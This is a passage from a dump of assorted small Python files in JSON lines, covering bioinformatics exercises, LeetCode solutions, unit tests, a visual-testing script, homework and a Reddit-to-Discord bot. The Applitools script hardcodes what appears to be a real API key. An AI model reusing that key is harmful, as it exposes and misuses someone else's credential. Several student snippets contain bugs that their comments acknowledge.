ATCGATCGATCGATCGACTGACTAGTCATAGCTATGCATGTAGCTACTCGATCGATCGATCGATCGATCGATCGATCGATCGATCATGCTATCATCGATCGATATCGATGCATCGACTACTAT\n\n#It comprises two exons and an intron. The first exon runs from the start of the sequence to base number 63 (starting counting from zero),\n# and the second exon runs from base 91 (also counting from zero) to the end of the sequence. Write a program that will print just the coding regions of the DNA sequence.\n\n\nmy_string = 'ATCGATCGATCGATCGACTGACTAGTCATAGCTATGCATGTAGCTACTCGATCGATCGATCGATCGATCGATCGATCGATCGATCATGCTATCATCGATCGATATCGATGCATCGACTACTAT'\n\nresult = my_string[0:63] + my_string[91:] #should be 90 instead of 91.\n\n# ! SPLICING OUT INTRONS, PART TWO\n\n#? 
Using the data from part one, write a program that will calculate what percentage of the DNA sequence is coding.\n\nmy_string = 'ATCGATCGATCGATCGACTGACTAGTCATAGCTATGCATGTAGCTACTCGATCGATCGATCGATCGATCGATCGATCGATCGATCATGCTATCATCGATCGATATCGATGCATCGACTACTAT'\n\n\ncoding = my_string[0:63] + my_string[91:]\n\nresult = len(coding)/len(my_string)\n\nprint(result)\n\n\n#SPLICING OUT INTRONS, PART THREE\n\n#Using the data from part one, write a program that will print out the original genomic \n#DNA sequence with coding bases in uppercase and non-coding bases in lowercase.\n\nmy_string[64:90]\n\nresult = my_string[0:63] + my_string[64:90].lower() + my_string[91:] #should be [63:90] and [90:]\n\nprint(result)","repo_name":"kasunicts48/bioInformatics","sub_path":"Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35065261998","text":"class Solution(object):\n def wordBreak(self, s, wordDict):\n \"\"\"\n :type s: str\n :type wordDict: List[str]\n :rtype: List[str]\n \"\"\"\n res = self.dfs(s, wordDict, {})\n # print(res)\n return res\n\n def dfs(self, s, wordDict, map):\n if s in map:\n return map[s]\n res = []\n if s == '':\n res.append('')\n return res\n for word in wordDict:\n if s.startswith(word):\n sublist = self.dfs(s[len(word):], wordDict, map)\n for sub in sublist:\n if sub == '':\n res.append(word + '' + sub)\n else:\n res.append(word + ' ' + sub)\n\n map[s] = res\n return res \n\n\n# string = \"catsanddog\"\n# wordDict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"]\n# s = Solution()\n# res = s.wordBreak(string, wordDict)\n\n# string = \"pineapplepenapple\"\n# wordDict = [\"apple\",\"pen\",\"applepen\",\"pine\",\"pineapple\"]\n# s = Solution()\n# res = s.wordBreak(string, wordDict)","repo_name":"TalentBoy2333/practice","sub_path":"LeetCode/140-Word Break II/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"23930090302","text":"# -*- coding: utf-8 -*-\n\nfrom mock import MagicMock, patch\n\nfrom makeyfile.runners.command import CommandRunner\n\n\ndef test_runners_comand_call():\n runner = CommandRunner('x')\n\n def _cb(command, *args):\n assert command == \"bar\"\n assert args == (2, 3)\n return 23\n\n result = runner(_cb, \"bar\", 1, 2, 3)\n assert result == 23\n\n\ndef test_runners_comand_parse_module():\n runner = CommandRunner('x')\n assert runner.parse_module(\"foo.bar\") == \"foo.bar\"\n assert runner.parse_module(\"foo7.bar23\") == \"foo7.bar23\"\n\n\ndef test_runners_comand_parse_callable():\n runner = CommandRunner('x')\n assert runner.parse_callable(\"foo.bar\") == \"Command\"\n assert runner.parse_callable(\"foo7.bar23\") == \"Command\"\n\n\ndef test_runners_comand_resolve():\n runner = CommandRunner('x')\n\n with patch(\"makeyfile.runners.command.PythonRunner.resolve\") as m:\n command_m = MagicMock(return_value=23)\n m.return_value = command_m\n result = runner.resolve(\"foo\")\n assert result == 23\n assert m.call_args[0] == (\"foo\", )\n assert command_m.call_args[0] == ('x', )\n","repo_name":"translate/makeyfile","sub_path":"tests/runners/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"18350890421","text":"from webdriver_manager.chrome import ChromeDriverManager\r\nfrom 
selenium.webdriver import Chrome\r\nimport os\r\n\r\n\r\nfrom applitools.selenium import (\r\n logger,\r\n VisualGridRunner,\r\n Eyes,\r\n Target,\r\n BatchInfo,\r\n BrowserType,\r\n DeviceName,\r\n)\r\n\r\n\r\ndef set_up(eyes):\r\n\r\n eyes.configure.set_api_key(\"VpEXwHtKENoxwxc7njHv2AJVzJp4Lqt8uGsr103Etp4Ss110\")\r\n\r\n\r\n eyes.configure.set_batch(BatchInfo(\"flaticon\"))\r\n\r\n (\r\n eyes.configure.add_browser(800, 600, BrowserType.CHROME)\r\n .add_browser(700, 500, BrowserType.FIREFOX)\r\n .add_browser(1600, 1200, BrowserType.IE_11)\r\n .add_browser(1024, 768, BrowserType.EDGE_CHROMIUM)\r\n .add_browser(800, 600, BrowserType.SAFARI)\r\n .add_device_emulation(DeviceName.iPhone_X)\r\n .add_device_emulation(DeviceName.Pixel_2)\r\n )\r\n\r\n\r\ndef ultra_fast_test(web_driver, eyes):\r\n try:\r\n\r\n web_driver.get(\"https://odore.ml/\")\r\n\r\n eyes.open(\r\n web_driver, \"register\", \"main2\", {\"width\": 800, \"height\": 600}\r\n )\r\n\r\n # check the login page with fluent api, see more info here\r\n # https://applitools.com/docs/topics/sdk/the-eyes-sdk-check-fluent-api.html\r\n eyes.check(\"\", Target.window().fully().with_name(\"main page\"))\r\n\r\n web_driver.find_element_by_name(\"Sign in\").click() #find_element_by_id(\"Sign in\").click()\r\n\r\n # Check the app page\r\n eyes.check(\"\", Target.window().fully().with_name(\"App page\"))\r\n\r\n # Call Close on eyes to let the server know it should display the results\r\n eyes.close_async()\r\n except Exception as e:\r\n eyes.abort_async()\r\n print(e)\r\n\r\n\r\ndef tear_down(web_driver, runner):\r\n # Close the browser\r\n web_driver.quit()\r\n\r\n # we pass false to this method to suppress the exception that is thrown if we\r\n # find visual differences\r\n all_test_results = runner.get_all_test_results(False)\r\n print(all_test_results)\r\n\r\n\r\n# Create a new chrome web driver\r\nweb_driver = Chrome(ChromeDriverManager().install())\r\n\r\n# Create a runner with concurrency of 1\r\nrunner = VisualGridRunner(1)\r\n\r\n# Create Eyes object with the runner, meaning it'll be a Visual Grid eyes.\r\neyes = Eyes(runner)\r\n\r\nset_up(eyes)\r\n\r\ntry:\r\n # ⭐️ Note to see visual bugs, run the test using the above URL for the 1st run.\r\n # but then change the above URL to https://id.freepikcompany.com/login?client_id=flaticon\r\n # (for the 2nd run)\r\n ultra_fast_test(web_driver, eyes)\r\nfinally:\r\n tear_down(web_driver, runner)","repo_name":"shardvova/shard","sub_path":"path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11063346860","text":"###Task 1: WAP to create a function which returns the sum of all the elements provided to it as an argument. 
The argument list will be dynamic.#####\nprint (\"task 1 started\")\ndef listsum(total, *args):\n for i in range(0, len(args)):\n total = total + args[i]\n print(total)\ntotal = 0\nnumber = input(\"Enter the number with space\")\nnumber = number.split()\nfor i in range(len(number)):\n number[i] = float(number[i])\n\nlistsum(total, *number)\n\n###TASK DAY 02 ####\ndef myFun(**kwargs):\n ret = 0\n count = 0\n maximum = 0\n string = \"\"\n failed = \"\"\n for k , j in kwargs.items():\n count += 1\n ret = ret + j\n if j > maximum:\n maximum = j\n string = k\n if j < 33: \n # collect every failing student, not only the last one seen\n failed = (failed + \" \" + k).strip()\n print(\"the average marks is \", ret/count)\n print(\"the pass mark is 33\")\n print(\"the failed students are\", failed)\n print(\"%s = %s\" % (string, maximum))\n #print(stri)\nmyFun(rahul =80, aman =95, palak=45, anmol =60 , hi= 12) \n\n#####https://github.com/LetusDevops/LearnPython/tree/main/day2 task3 ###\na_dict = [\n {\n \"name\": \"gara\",\n \"power\": \"some sand related jutsu\",\n \"powerlevel\": 199,\n \"frieds\": [\n {\n \"name\": \"Naruto\",\n \"friend_points\": 28,\n \"enemies\": [\"Saitama\"] \n },\n {\n \"name\": \"Boruto\",\n \"friend_points\": 18,\n \"enemies\": [\"Saitama\"]\n }\n ]\n },\n {\n \"name\": \"Alex\",\n \"power\": \"some titans powers\",\n \"powerlevel\": 1199,\n \"frieds\": [\n {\n \"name\": \"Soniya\",\n \"friend_points\": 128,\n \"enemies\": [\"Saitama\"] \n }\n ]\n },\n {\n \"name\": \"King\",\n \"power\": \"some titans powers\",\n \"powerlevel\": 1199,\n \"frieds\": [\n {\n \"name\": \"Saitama\",\n \"friend_points\": 128,\n \"enemies\": [\"Naruto\", \"gara\", \"boruto\"] \n }\n ]\n }\n \n] \n# Iterating over keys\nfor i in a_dict:\n print(i['name'] , i['power'], i ['powerlevel'], i['frieds'][0]['name'], i['frieds'][0]['friend_points'], i['frieds'][0]['enemies'][0], i['frieds'][0]['name'])\n\n\n\n\n\n\n","repo_name":"navnitDevOps/python","sub_path":"python_Day_02.py","file_name":"python_Day_02.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"17344591097","text":"import hashlib\n\nimport torch\n\n\nclass UnNormalize(object):\n def __init__(self, mean, std):\n self.mean = mean\n self.std = std\n\n def __call__(self, tensor):\n \"\"\"\n Args:\n tensor (Tensor): Tensor image of size (C, H, W) to be normalized.\n Returns:\n Tensor: Normalized image.\n \"\"\"\n for t, m, s in zip(tensor, self.mean, self.std):\n t.mul_(s).add_(m)\n # The normalize code -> t.sub_(m).div_(s)\n return tensor\n\n\ndef tensor_hash(tensor):\n tensor = tensor.detach().cpu().numpy().tobytes()\n return hashlib.sha256(tensor).hexdigest()\n\ndef yield_batches(images, batch_size):\n for i in range(0, len(images), batch_size):\n yield images[i:i+batch_size]\n\ndef set_multiple_indices_to_zero(tensor, indices):\n # Get the batch size\n batch_size = tensor.shape[0]\n # Get the indices in 1D\n indices = indices[:,0]*tensor.shape[1]+indices[:,1] # calculate 1D indices\n # Create a mask of the same shape as the tensor\n mask = torch.ones_like(tensor)\n # reshape the mask to 1D\n mask = mask.reshape(-1)\n # set the corresponding element in the mask to 0\n mask[indices] = 0\n # reshape the mask back to 2D\n mask = mask.reshape(tensor.shape)\n # Apply the mask to the tensor\n tensor = tensor * mask
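\n # A minimal usage sketch (editor's addition; the values are purely illustrative):\n # t = torch.arange(12.).reshape(3, 4)\n # idx = torch.tensor([[0, 1], [2, 3]])\n # zeroed = set_multiple_indices_to_zero(t, idx)  # zeroes t[0, 1] and t[2, 3]\n return 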
tensor\n","repo_name":"LucasFenaux/torch-gaggle","sub_path":"gaggle/utils/torch_helper.py","file_name":"torch_helper.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"23734556889","text":"import subprocess\nimport sys\ndef check_dependencies(path):\n requirements_path = path + '/requirements.txt'\n\n try:\n # NOTE: 'pip check' verifies the dependencies of the packages installed in\n # the current environment and does not accept a '-r' flag; passing the\n # requirements file (kept above for reference) made the call fail on every run.\n result = subprocess.run(\n ['pip', 'check'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n check=True\n )\n\n print(\"Dependencies Version Up to Date.\")\n sys.exit(0)\n\n except subprocess.CalledProcessError as e:\n print(\"Dependencies Versions Outdated.\")\n print(e.stderr.decode())\n sys.exit(1)\n\nif __name__ == '__main__':\n path = \"/Users/bilgici/Desktop/vulnerablelab/\"\n check_dependencies(path)","repo_name":"MustafaBilgici/SucoshScanny","sub_path":"dependencycheck/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"43"} +{"seq_id":"7882524165","text":"# [WIP]\r\nimport re\r\nimport os\r\nimport json\r\nimport glob\r\nimport glob2\r\nimport numpy as np\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom pathlib import Path\r\nfrom utils import (\r\n get_ner_content,\r\n get_raw_content,\r\n get_regex_content,\r\n get_sw_content,\r\n get_stop_words,\r\n get_stem_content,\r\n)\r\n\r\ndocs = []\r\nfile_path_list = glob2.glob(\"./data/*\")[:]\r\n\r\nfor file_path in file_path_list:\r\n print(f\"Processing {file_path}...\")\r\n name = os.path.basename(file_path)\r\n content = get_raw_content(file_path) # raw content\r\n content = get_regex_content(content) # regex filtering\r\n content = get_sw_content(content) # remove stop words\r\n content = get_stem_content(content) # Porter Stemming\r\n content = get_ner_content(content) # NER filtering\r\n docs.append(content)\r\n\r\n# TF-IDF\r\nvectorizer = TfidfVectorizer(\r\n token_pattern=r\"(?u)\\b\\w+\\b\", norm=None, stop_words=get_stop_words()\r\n)\r\nX = vectorizer.fit_transform(docs)\r\nfeature_names = np.array(vectorizer.get_feature_names())\r\nsorted_indexes = X.toarray().argsort()\r\n# for idx, indexes in enumerate(sorted_indexes):\r\n# print(f\"==={file_path_list[idx]}===\")\r\n# print(feature_names[indexes][:50]) # 50 smallest tf-idf terms (filtered out)\r\n# print(feature_names[indexes][::-1][:50]) # top-50 tf-idf terms (keywords)\r\n\r\noutput = {}\r\nfor idx, indexes in enumerate(sorted_indexes):\r\n key = os.path.basename(file_path_list[idx])\r\n print(feature_names[indexes][::-1][:50]) # top-50 tf-idf terms (keywords)\r\n output[key] = feature_names[indexes][::-1][:50].tolist()\r\n\r\nwith open(\"tfidf_top50_each_doc.json\", \"w\") as f:\r\n f.write(json.dumps(output))\r\n","repo_name":"temp4git1234/temp_proj","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19028536479","text":"#!/usr/bin/env python3\n\n\ndef steps_between_cross(cross_points, path1, path2):\n steps = {}\n for point in cross_points:\n\n index = 0\n for step in path1:\n index += 1\n if step == point:\n steps[point] = index\n break\n\n index = 0\n for step in path2:\n index += 1\n if step == point:\n steps[point] += index\n break\n\n return min([i for i in steps.values()])\n\n\ndef shortest_manhattan_distance(goal, points):\n distances = []\n\n x1, y1 = goal\n for point in points:\n x2, y2 = point\n distance = abs(x1 - x2) + abs(y1 - 
y2)\n distances.append((distance, point))\n\n return min([i[0] for i in distances])\n\n\ndef trace_path_coordinates(steps):\n path = []\n x, y = 0, 0\n\n for step in steps:\n direction = step[0]\n distance = int(step[1:])\n\n if direction == 'R':\n for _ in range(distance):\n x += 1\n path.append((x, y))\n elif direction == 'L':\n for _ in range(distance):\n x -= 1\n path.append((x, y))\n elif direction == 'U':\n for _ in range(distance):\n y += 1\n path.append((x, y))\n elif direction == 'D':\n for _ in range(distance):\n y -= 1\n path.append((x, y))\n else:\n break\n\n return path\n\n\nif __name__ == \"__main__\":\n my_input = []\n\n with open('input_3.txt') as f_object:\n for line in f_object:\n my_input.append(line)\n\n wire_1 = my_input[0].split(',')\n wire_2 = my_input[1].split(',')\n\n wire_path_1 = trace_path_coordinates(wire_1)\n wire_path_2 = trace_path_coordinates(wire_2)\n\n cross_points = set(wire_path_1) & set(wire_path_2)\n\n print(f'The shortest distance is: {shortest_manhattan_distance((0, 0), cross_points)}.')\n\n shortest_path_to_cross = steps_between_cross(cross_points, wire_path_1, wire_path_2)\n print(f'The shortest amount of steps to first cross is {shortest_path_to_cross}.')\n","repo_name":"MalcolmFFS/AdventOfCode","sub_path":"2019/advent_3.py","file_name":"advent_3.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"8273886925","text":"#+======================================================================================+\r\n# |Author : Kolli Hrudhay\r\n# |Package : Library Books\r\n# |Module : readingFun.py\r\n# |Language : Python 3.7\r\n# |Description : This module when called by the Assignment_code.py module, \r\n# will return the command provided by the later module \r\n# (from the files inputPS6.txt,promptsPS6.txt files) in the \r\n# required and proper format (without extra spaces,symbols etc) \r\n# for the Assignment_code.py module to correctly identify \r\n# and execute the function.\r\n#\r\n#+======================================================================================+\r\n\r\n\r\n\r\ndef readingFun(func):\r\n ''' This function read values from the input provided by the Assignment_code.py module and return the command\r\n in the right/required format. \r\n ''' \r\n elements = []\r\n with open(func, 'r') as file1:\r\n for f1 in file1:\r\n if len(f1)>1:\r\n if ',' in f1:\r\n temp = f1.split(',')\r\n\r\n elif ':' in f1:\r\n temp = f1.split(':')\r\n\r\n else:\r\n temp=[f1]\r\n\r\n for i in range(len(temp)):\r\n temp[i] = temp[i].strip()\r\n \r\n elements.append(temp)\r\n\r\n return elements\r\n","repo_name":"k1hrudhay/Library-Books","sub_path":"readingFun.py","file_name":"readingFun.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33708358782","text":"phones=[]\nclass Handphone:\n def __init__(self, version, brand, color):\n self.version = version\n self.brand = brand\n self.color = color\n def info(self):\n print(f\"Version: {self.version}\\nBrand: {self.brand}\\ncolor: {self.color}\")\n def register(self):\n phones.append(self)\nwhile True:\n forward = input(\"Enter a phone? 
(y/n) \")\n if forward == 'n':\n break\n elif forward == 'y':\n phoneversion = input('Enter phone version: ')\n phonebrand = input('Enter phone brand: ')\n phonecolor = input('Enter phone color: ')\n\n handphone1 = Handphone(phoneversion, phonebrand, phonecolor)\n handphone1.register()\n\nfor phone in phones:\n phone.info()","repo_name":"graciella12/python","sub_path":"handphone.py","file_name":"handphone.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37581458406","text":"import numpy as np\nimport math\nimport datetime\nimport random\n\nx, y, z = [False] * 3\nprint(x, y, z)\n\nx = 5, 5\ny = 10, 10\n\nprint(math.dist(x, y))\n\nclass Test:\n\n def __init__(self):\n pass\n\nx = Test()\nx.score = 5\nprint(x.score)\ny = None\nprint(not y)\n\nt = datetime.datetime.now()\nx = 1\nfor i in range(100000):\n x += 1\nt2 = float(str(datetime.datetime.now() - t)[-9:])\nprint(t2)\n\nx = np.array([11.12345])\nprint(x.round(3))\nprint()\n\nclass Test:\n\n def __init__(self):\n self.x = 5\n self.y = 5\n\n def func1(self):\n self.x = 10\n\n def func2(self):\n self.y = 10\n return 10\n\np = .1\nfor i in range(5):\n if random.random() < p:\n break\nelse:\n print('boop', i)\nprint('beep', i)\n\n\nx = [1,2,3,4,5,6,7,8]\nprint(random.choices(x, k=3))\nfor i, j in zip([[]], [[]]):\n pass\n\nx = tuple(\"5, 10, 20\")\nprint(x)","repo_name":"ColinBalfour/Pathfinding","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"19287018487","text":"car = input(\"What car do you want?\")\n\nprint(\"Let me see if I can find you a Subaru \"+car)\n\npeople = input(\"How many people? 
\")\npeople = int(people)\nif people > 8:\n print(\"No desk\")\nelse:\n print(\"Please come in \")\n\nnumber = input(\"Please input a number:\")\nnumber = int(number)\n\nif number%10 == 0:\n print(\"数字 \"+str(number)+\" 是10的倍数\")\nelse:\n print(\"数字 \" + str(number) + \" 不是10的倍数\")","repo_name":"Katherine916/suye","sub_path":"seven/test71.py","file_name":"test71.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18348891747","text":"from django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.contrib.auth import get_user_model\nfrom django import forms\n\n\nclass CustomUserCreationForm(UserCreationForm):\n username = forms.CharField(\n label='사용자 이름',\n widget=forms.TextInput(\n attrs={\n 'class': 'my-title',\n 'placeholder': 'Enter the title',\n 'maxlength': 10,\n }\n )\n )\n \n class Meta(UserCreationForm.Meta):\n model = get_user_model()\n fields = ('username', 'email', 'first_name', 'last_name')\n\n\n\nclass CustomUserChangeForm(UserChangeForm):\n class Meta(UserChangeForm.Meta):\n model = get_user_model()\n fields = ('email', 'first_name', 'last_name', 'username', 'password')","repo_name":"yujinni/Django-Practice","sub_path":"accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7434004244","text":"import numpy as np\nimport tensorflow\n\n\ndef saveInputMasks(imasks, mask_save_path, im_save_path, train):\n #imasks: list of input masks (each element of list of shape (512,512,3))\n #mask_save_path: path where you want to store array with all input masks in it\n #im_save_path: path where you want to store each input mask as image\n #train: generating for training data if \"True\", generating for testing data if \"False\"\n ##############################\n #create input placeholder list\n inp = []\n print(\"Serial no. 
of input image being saved:\")\n for i in range(len(imasks)):\n print(i)\n #save image form of input mask\n im_i = tensorflow.keras.preprocessing.image.array_to_img(imasks[i])\n im_i_path = im_save_path + str(i) + \".jpg\"\n tensorflow.keras.preprocessing.image.save_img(im_i_path,im_i)\n #save array form\n input_i = tensorflow.reshape(imasks[i],(1,512,512,3))\n inp.append(input_i.numpy())\n #save input image array\n if train == True:\n train_input = np.asarray(inp)\n np.save(mask_save_path+'train_inputs.npy',train_input)\n else:\n train_input = np.asarray(inp)\n np.save(mask_save_path+'test_inputs.npy',train_input)\n\n","repo_name":"Dzhuhnuhmeidzhai/FloorPlanResearcher","sub_path":"MasksGeneration/Scripts/saveInputMasks.py","file_name":"saveInputMasks.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"43"} +{"seq_id":"28976801987","text":"from discord.ext import tasks, commands\nfrom itertools import zip_longest\nfrom cogs.db_operations import db_rdt_cmd_data_get, db_get_conf_server_all, db_get_nsfw_channels, \\\n db_rdt_rand_content_get, db_rdt_sub_translt_get\nimport ffmpy\nimport os\nimport urllib.request as req\nfrom gfycat.client import GfycatClient\nimport discord\nimport random\nimport asyncio\nimport functools\nimport logging\nimport shortuuid\n\n# Retrieve logger\nlog = logging.getLogger(\"General_logs\")\n\n# Used to check if a command is NSFW decorator\nc_dict = {items[0]: items[1] for items in db_rdt_cmd_data_get()} # [dict] of commands (dict key is command)\n# Used to get the list of commands the the aliases system\nc_list = [items[0] for items in db_rdt_cmd_data_get()] # [list] of all commands\n# Used to get the list of sfw commands for the helper menu\nc_list_sfw = [items[0] for items in db_rdt_cmd_data_get() if items[1] == 0] # [list] of SFW commands\n# Used to get the list of nsfw commands for the helper menu\nc_list_nsfw = [items[0] for items in db_rdt_cmd_data_get() if items[1] == 1] # [list] of NSFW commands\n\nlog.info('[COGS] RedditScrap COG loaded')\n\n# FUNCTIONS ######################################################################################\n##################################################################################################\n\n\ndef create_gif(data):\n ff1 = ffmpy.FFmpeg(\n inputs={\"tempDL.mp4\": None},\n outputs={\"tempDiscord.gif\": '-y -r 12 -loglevel quiet -vf scale=640:-1'})\n ff2 = ffmpy.FFmpeg(\n inputs={\"tempDL.mp4\": None},\n outputs={\"tempDiscord.gif\": '-y -r 10 -loglevel quiet -vf scale=640:-1'})\n ff3 = ffmpy.FFmpeg(\n inputs={\"tempDL.mp4\": None},\n outputs={\"tempDiscord.gif\": '-y -r 10 -loglevel quiet -vf scale=480:-1'})\n ff4 = ffmpy.FFmpeg(\n inputs={\"tempDL.mp4\": None},\n outputs={\"tempDiscord.gif\": '-y -r 10 -loglevel quiet -vf scale=320:-1'})\n ff5 = ffmpy.FFmpeg(\n inputs={\"tempDL.mp4\": None},\n outputs={\"tempDiscord.gif\": '-y -r 8 -loglevel quiet -vf scale=320:-1'})\n\n if data[2] < 10: # If the gif is less than 10 seconds\n ff1.run()\n else: # If the gif is more than 10 seconds\n ff2.run()\n if os.path.getsize(\"tempDiscord.gif\") < 8000000:\n pass\n else:\n ff3.run()\n if os.path.getsize(\"tempDiscord.gif\") < 8000000:\n pass\n else:\n ff4.run()\n if os.path.getsize(\"tempDiscord.gif\") < 8000000:\n pass\n else:\n ff5.run()\n\n\ndef prepare_embed(content_url, content_type):\n # Generate UUID\n data_uid = shortuuid.uuid()\n\n #if isinstance(content_url, tuple):\n # log.debug('Prepare embed started / ' + content_url[1] + 
' / GFYCAT') # DEBUG\n # req.urlretrieve(content_url[1], 'tempDL.mp4')\n # create_gif(content_url)\n # file = discord.File(os.path.join(os.getcwd(), \"tempDiscord.gif\"), filename='tempDiscord.gif')\n # embed = discord.Embed()\n # embed.set_image(url=\"attachment://tempDiscord.gif\")\n\n log.debug('Creating embed for url \"' + content_url + '\" of type \"' + content_type) # DEBUG\n file = None\n embed = discord.Embed()\n embed.set_image(url=content_url)\n return embed, file\n\n\n# DECORATORS #####################################################################################\n##################################################################################################\n\n# Decorator to check for NSFW commands\ndef nsfw_check():\n async def predicate(ctx):\n if c_dict.get(ctx.invoked_with) == 1: # Check if NSFW command\n if db_get_conf_server_all(ctx.guild.id)[0] == 0: # Checking current nsfw_mode (disabled)\n await ctx.channel.send(\"Ey non, pas ici petit coquin ! Ce discord n'est pas NSFW !\")\n elif db_get_conf_server_all(ctx.guild.id)[0] == 1: # Checking current nsfw_mode (semi-enabled)\n if ctx.channel.id in db_get_nsfw_channels(ctx.guild.id): # If channel is an authorized nsfw channel\n return True\n else:\n await ctx.channel.send(\"Ey non, pas ici petit coquin ! Réessaie dans un channel NSFW !\")\n elif db_get_conf_server_all(ctx.guild.id)[0] == 2: # Checking current nsfw_mode (enable)\n return True\n else:\n return True\n\n return commands.check(predicate)\n\n\n# Sanity-check decorator to see if everything config related to this cog is fine\ndef check_cog_redditscrap():\n async def predicate(ctx):\n conf_server_all = db_get_conf_server_all(ctx.guild.id)\n error_nbr = 0\n if conf_server_all is None:\n raise commands.UserInputError(\"Ce serveur n\\'est pas configuré pour utiliser cette commande !\")\n else:\n if not 0 <= conf_server_all[0] <= 2: # nsfw_mode\n error_nbr += 1\n if not 4 <= conf_server_all[1] <= 30: # short_reddit_timer\n error_nbr += 1\n if not 10 <= conf_server_all[2] <= 90: # long_reddit_timer\n error_nbr += 1\n\n if error_nbr == 0:\n return True\n else:\n await ctx.channel.send(\"Ce serveur n\\'est pas configuré pour utiliser cette commande.\\n\"\n \"Configurations erronées/manquantes : {}\"\n .format(error_nbr))\n\n return commands.check(predicate)\n\n\nclass RedditScrap(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n # CLASS FUNCTIONS ################################################################################\n ##################################################################################################\n\n async def check_react(self, ctx, embed, file, isheavy):\n await ctx.message.clear_reactions()\n\n # Change the timer depending if the content is heavy or not\n if isheavy is True:\n timer = db_get_conf_server_all(ctx.guild.id)[2] # Get server specific long-timer reddit value\n else:\n timer = db_get_conf_server_all(ctx.guild.id)[1] # Get server specific short-timer reddit value\n\n # Check if the embed will contain a file attachement or not\n if file is None:\n img = await ctx.channel.send(embed=embed)\n else:\n img = await ctx.channel.send(file=file, embed=embed)\n\n await img.add_reaction('\\N{WHITE HEAVY CHECK MARK}')\n await img.add_reaction('\\N{CROSS MARK}')\n\n def check(react, discord_user):\n return discord_user.bot is False and str(react.emoji) in ['\\N{WHITE HEAVY CHECK MARK}',\n '\\N{CROSS MARK}'] and react.message.id == img.id\n\n try:\n reaction, user = await self.bot.wait_for('reaction_add', timeout=timer, 
check=check)\n except asyncio.TimeoutError:\n await img.delete()\n await ctx.message.delete()\n else:\n\n if str(reaction.emoji) == '\\N{WHITE HEAVY CHECK MARK}':\n await img.clear_reactions()\n else:\n await img.delete()\n await ctx.message.delete()\n\n # COMMANDS #######################################################################################\n ##################################################################################################\n\n @check_cog_redditscrap()\n @nsfw_check()\n @commands.command(aliases=c_list[1:])\n async def sendmeme(self, ctx):\n log.debug('Processing started for command : ' + ctx.invoked_with) # DEBUG\n sub_tuple = tuple([items[0] for items in db_rdt_sub_translt_get(ctx.invoked_with)]) # Tuple of subs concerned by command\n log.debug('List of subs concerned by the command : ' + str(sub_tuple)) # DEBUG\n await ctx.message.add_reaction('\\N{HOURGLASS}')\n content_url, content_type = db_rdt_rand_content_get(sub_tuple)\n log.debug('Chosen content URL is : ' + content_url + ' of type ' + content_type) # DEBUG\n if content_type in ['gifv', 'gif']:\n isheavy = True\n else:\n isheavy = False\n embed, file = prepare_embed(content_url, content_type)\n await self.check_react(ctx, embed, file, isheavy)\n\n # !rhelp command for help\n @check_cog_redditscrap()\n @commands.command()\n async def rhelp(self, ctx):\n\n embed = discord.Embed(title=\"Bienvenue sur le merveilleux 🤖 des Blackstones !\",\n description=\"Je suis la pour vous aider 😄\", color=0xd5d500)\n\n embed.set_footer(\n text=\"Lorsque que vous demandez une image, le bot l'affichera pendant 14 secondes, puis elle \"\n \"disparaîtra. \\n \"\n \"Cliquer sur la réaction ✅ la laissera en permanent. \\n Cliquer sur la réaction â�Œ supprimera \"\n \"l'image \"\n \"directement. 
